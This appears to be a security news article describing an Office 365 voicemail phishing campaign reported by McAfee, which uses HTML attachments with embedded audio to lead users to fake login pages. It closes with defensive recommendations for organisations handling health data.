There’s an Office 365 phishing campaign going on within the last few weeks that employs voicemail messages to lure users to divulge their Office 365 account credentials. The details of the campaign are listed below together with some of the most frequent Office 365 mistakes that heighten the risk of an expensive data breach and HIPAA penalty.
Office 365 Voicemail Phishing Scam
Researchers at McAfee discovered the Office 365 voicemail phishing scam. The scam has been going on for a few weeks and most victims are from middle management and executives of high profile businesses. A big selection of industries, including healthcare, were already attacked. However, most of the attacks were on companies in the service, IT services, and retail industries.
The email messages seem to be from Microsoft and advise Office 365 users that there is a new voicemail message. The email messages include a reference number, the caller’s phone number, the date of the phone call, and the length of the voicemail message. The email messages seem to be automated and inform the recipient to give prompt attention to view the message.
The phishing emails are made up of an HTML attachment that will play a brief summary of the message contained in the voicemail when opened. Users will then be rerouted to a fake Office 365 website. In order to listen to the complete message, they need to key in their Office 365 credentials, which will be snagged by the attacker. Users will finally be rerouted to the real Office.com site but there will be no voicemail message played.
This isn’t the first time attackers used voicemail and missed call alerts as bait in phishing attacks, however, it is unusual to use audio recordings in phishing emails. The excerpt voicemail recording is an embedded .wav file contained in the HTML attachment.
According to the McAfee reports, there are three distinct phishing kits being used to create the spoofed Microsoft Office 365 sites, which implies there are three threat groups utilizing this scheme.
Although there are warning indicators that ought to notify security-aware personnel that this is a fraud, unfamiliarity with this kind of phishing scheme and the use of Microsoft trademarks and carbon-copy Office 365 sign in windows persuade account holders that the voicemail alerts are authentic.
The recent phishing campaigns aimed towards Office 365 users are increasing. In order to reduce the risk of such phishing campaigns brought about by Office 365 users mistakes, here are the steps that need to be undertaken:
- Use a third-party anti-phishing solution in addition to Office 365’s anti-spam and anti-phishing protection
- Use Multi-Factor Authentication to help deter the use of compromised credentials in accessing Office 365 email accounts
- Look at the DHS Cybersecurity and Infrastructure Security Agency advice before switching from on-premises mail services to Office 365 to avoid vulnerabilities and threats
- Configure logs and monitor email logs consistently for indications of unauthorized access and questionable employee behavior
- Use encryption in your emails to prevent interception of ePHI in transit
- Read your Business Associate Agreement and make sure that you’re using Office 365 in a manner that is compliant to HIPAA
- Backup your Office 365 environment in case you need to recover data and use email archiving in case it is required for legal recovery or compliance audits.